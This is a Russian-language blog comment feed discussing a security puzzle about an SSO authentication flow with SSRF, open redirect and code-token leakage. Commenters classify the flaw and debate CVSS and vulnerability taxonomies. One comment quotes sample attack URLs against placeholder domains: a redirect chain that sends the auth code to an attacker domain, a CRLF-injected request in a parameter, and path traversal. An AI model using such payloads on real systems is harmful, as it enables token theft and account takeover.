tag:blogger.com,1999:blog-4711612808026791519.post5209732951699801457..comments2024-03-24T00:14:08.699-07:00Comments on asintsov: Интересный случай с SSRF.Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-4711612808026791519.post-17025138878677416382013-02-06T21:55:56.512-08:002013-02-06T21:55:56.512-08:00Этот комментарий был удален автором.isciurushttps://www.blogger.com/profile/16918471305442707785noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-88820862915836148872013-01-19T08:47:21.357-08:002013-01-19T08:47:21.357-08:00Не хотел обидеть. Да, я уже прочитал дока становит...Не хотел обидеть. Да, я уже прочитал дока становится все лучше и лучше 8) Alexey Sintsovhttps://www.blogger.com/profile/16563676942164858618noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-16547192128110857392013-01-18T18:49:44.014-08:002013-01-18T18:49:44.014-08:00я ж не только вроперы продвигаю!
даже наоборот, ...я ж не только вроперы продвигаю! <br /><br />даже наоборот, именно server-side редиректы. с их помощью на статусах 307 и типа того можно оригинальные POST данные себе передавать. в доку добавил уже давно это.Vladimirhttps://www.blogger.com/profile/15214373847405926820noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-55677959937562669592013-01-17T00:04:52.410-08:002013-01-17T00:04:52.410-08:00Никто не спорит. Это как бы для закрепления и эффе...Никто не спорит. Это как бы для закрепления и эффекта "да, тру, гребаные теоретики нее пройдут!". Примеров больше чем 100500, этот просто на тему SSRF, что нынче новомодно, к тому же просто прикольный кейс, без XXE.<br /><br />P.S. Насколько я понимаю, у Дениса был сценарий с участием админа, то есть то было СЫКА а не ЫЫКА. Alexey Sintsovhttps://www.blogger.com/profile/16563676942164858618noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-50583010740677310752013-01-16T20:18:49.558-08:002013-01-16T20:18:49.558-08:00Парни, извините, вызываете юмор. Реально. Пусть с ...Парни, извините, вызываете юмор. Реально. Пусть с ним с ЫЫКА, пусть будет, всем хочется. НО!<br /><br />Любому человеку который занимается не поиском, а более менее прикладным использованием уязвимостей совершенно прозрачно, что из комбинации нескольких недочетов (weakness которые) и вектора атаки (а соответственно и промежуточных результатов) может возникнуть совсем-совсем другой vulnerability из который вырастет этакий себе impact, который и надо обратить в $ путем, например, показа заказчику (ну или более прямолинейным profit!). <br />Причем этот impact у системы может быть совсем другой чем у компонентов. И вполне для него считается и CVSS и другая метрика риска, но понятно, что не путем сложения исходных значений.<br />И примеров подобного я могу привести стописот из разных областей, не только appsec. <br /><br />Кстати, на Zeronights 2011 была офигенная преза на тему ЫЫКА. Или это не оно? :)<br /><br />http://www.slideshare.net/DefconRussia/denis-baranov-root-via-xss-10430099Sergey Gordeychikhttps://www.blogger.com/profile/12394785315671457548noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-54111929680522245712013-01-08T12:14:48.381-08:002013-01-08T12:14:48.381-08:00Sorry, too late. We already have a winner (from fi...Sorry, too late. We already have a winner (from first comment). Next time!Alexey Sintsovhttps://www.blogger.com/profile/16563676942164858618noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-74670138837124677922013-01-08T12:08:24.890-08:002013-01-08T12:08:24.890-08:00english dude! i want a chance to win a rubber duck...english dude! i want a chance to win a rubber duck too!micheehttps://www.blogger.com/profile/05937230965190972040noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-64270646409960330902013-01-08T10:15:47.847-08:002013-01-08T10:15:47.847-08:00>В данном случае это свойство системы (из двух ...>В данном случае это свойство системы (из двух серверов),а не компонентов(ПО) в отдельности.<br /><br />Конечно. Это уязвимость реализации схемы проверки подлинности.<br /><br />>Где нибудь есть описание или классификация таких штук?<br /><br />Есть прекрасная статья на тему того, почему _полезную_ классификацию уязвимостей построить нельзя: A critical analysis of vulnerability taxonomies (можно построить только слишком общую, негранулярную, классификацию). <br />Очевидно, что очень сложно классифицировать неатомарные концепты, а уязвимость - неатомарный в общем случае концепт, так как состоит из N недостатков (как у тебя в примере). Потому CWE и классифицирует именно недостатки - атомарные сущности.<br /><br />>Как считать CVSS2 - по каждой 'фиче' отдельно?<br /><br />На мой взгляд, все метрики уязвимостей примерно одинаково необъективны )<br />Т.е. смысл метрик в итоге какой? Приоритезировать процесс устранения. Для этого в целом подходит либо словесное описание уязвимости, сложности ее эксплуатации и реализуемость схем монетизации через нее, либо готовый приоритет на исправление по мнению эксперта (я всегда выбираю второе).<br /><br />>Кстати, этот пример иллюстрирует тот факт, что PenTest отличается от Vuln-Menagment<br /><br />Ммммм... Head shot терминами! Я под ними, кажется, понимаю совсем другое!Anonymoushttps://www.blogger.com/profile/10803765980668812597noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-77116641545729234192013-01-08T09:58:34.254-08:002013-01-08T09:58:34.254-08:00>В данном случае это свойство системы (из двух ...>В данном случае это свойство системы (из двух серверов),а не компонентов(ПО) в отдельности.<br /><br />Конечно. Это уязвимость реализации схемы проверки подлинности.<br /><br />>Где нибудь есть описание или классификация таких штук?<br /><br />Есть прекрасная статья на тему того, почему _полезную_ классификацию уязвимостей построить нельзя: A critical analysis of vulnerability taxonomies (можно построить только слишком общую, негранулярную, классификацию). <br />Очевидно, что очень сложно классифицировать неатомарные концепты, а уязвимость - неатомарный в общем случае концепт, так как состоит из N недостатков (как у тебя в примере). Потому CWE и классифицирует именно недостатки - атомарные сущности.<br /><br />>Как считать CVSS2 - по каждой 'фиче' отдельно?<br /><br />На мой взгляд, все метрики уязвимостей примерно одинаково необъективны )<br />Т.е. смысл метрик в итоге какой? Приоритезировать процесс устранения. Для этого в целом подходит либо словесное описание уязвимости, сложности ее эксплуатации и реализуемость схем монетизации через нее, либо готовый приоритет на исправление по мнению эксперта (я всегда выбираю второе).<br /><br />>Кстати, этот пример иллюстрирует тот факт, что PenTest отличается от Vuln-Menagment<br /><br />Ммммм... Head shot терминами! Я под ними, кажется, понимаю совсем другое!Anonymoushttps://www.blogger.com/profile/10803765980668812597noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-28024412934140096192013-01-08T02:50:16.398-08:002013-01-08T02:50:16.398-08:00Insufficient Authentication - хмм. А что такое уяз...Insufficient Authentication - хмм. А что такое уязвимость? В данном случае это свойство системы (из двух серверов),а не компонентов(ПО) в отдельности. Где нибудь есть описание или классификация таких штук? Как считать CVSS2 - по каждой 'фиче' отдельно? Дык там все не критично и в политику укладывается 8) <br /><br />P.S. Кстати, этот пример иллюстрирует тот факт, что PenTest отличается от Vuln-Menagment 8) По "менеджменту" уязвимостей серьезных нет..Alexey Sintsovhttps://www.blogger.com/profile/16563676942164858618noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-17579702158845352002013-01-08T02:17:23.370-08:002013-01-08T02:17:23.370-08:00>Так же, после нахождения ответа интересно посл...>Так же, после нахождения ответа интересно послушать то, как это можно классифицировать и какие были уязвимости?<br /><br />На мой взгляд, это можно рассматривать так. Code - токен, аутентифицирующий запросы пользователей. Раз так, к нему в частности и к схеме проверки подлинности в общем, применимы требования к схемам и протоколам аутентификации. <br />В нашем случае нарушается требование по безопасной передаче токена между сторонами. Т.е. уязвимость - Insufficient Authentication. Уязвимость, как верно было подмечено, является следствием нескольких недостатков, главным среди которых (т.н. enabling feature) является open redirect, позволяющий реализовать утечку токена.<br />Кмк, как-то так )Anonymoushttps://www.blogger.com/profile/10803765980668812597noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-13048871262067712292013-01-07T07:36:59.260-08:002013-01-07T07:36:59.260-08:00Тут, вроде бы, три разных атаки:
1. Нет проверки ...Тут, вроде бы, три разных атаки: <br />1. Нет проверки state (CSRF)<br />2. Нет проверки redirect_uri (code stealing)<br />3. Упомянутая<br />Хотя я-то в этом ни черта не понимаю, только don_huan мог увидеть баги быстрее, чем @homakov.isciurushttps://www.blogger.com/profile/16918471305442707785noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-814472968876137332013-01-07T06:58:57.983-08:002013-01-07T06:58:57.983-08:00Да. Шаг 3 только лишний =). Как вообщем и 2 ;) При...Да. Шаг 3 только лишний =). Как вообщем и 2 ;) Приватом адрес свой скинь, куда утку слать....Alexey Sintsovhttps://www.blogger.com/profile/16563676942164858618noreply@blogger.comtag:blogger.com,1999:blog-4711612808026791519.post-51015410241124512562013-01-07T06:48:12.239-08:002013-01-07T06:48:12.239-08:00don_huan передал мне буквально следующее:
======
...don_huan передал мне буквально следующее:<br />====== <br /><br />1. Sesión de fijación<br />https://s1.domain.com/authDone?code=<br /><br />2. Omisión de la autenticación<br />https://sso.domain.com/?afterauth=https://s1.domain.com/%3Furl=http://my.domain<br /><br />3. Solicitud falsificación<br />https://s1.domain.com/authDone?code=%0D%0A%0D%0AGET%20whatever<br /><br />3.1 Omisión de la autenticación<br />https://s1.domain.com/authDone?code=../../?afterauth=http://s1.domain.com%3Furl=http://my.domain/get_any_json<br /><br />======<br />Конец цитатыisciurushttps://www.blogger.com/profile/16918471305442707785noreply@blogger.com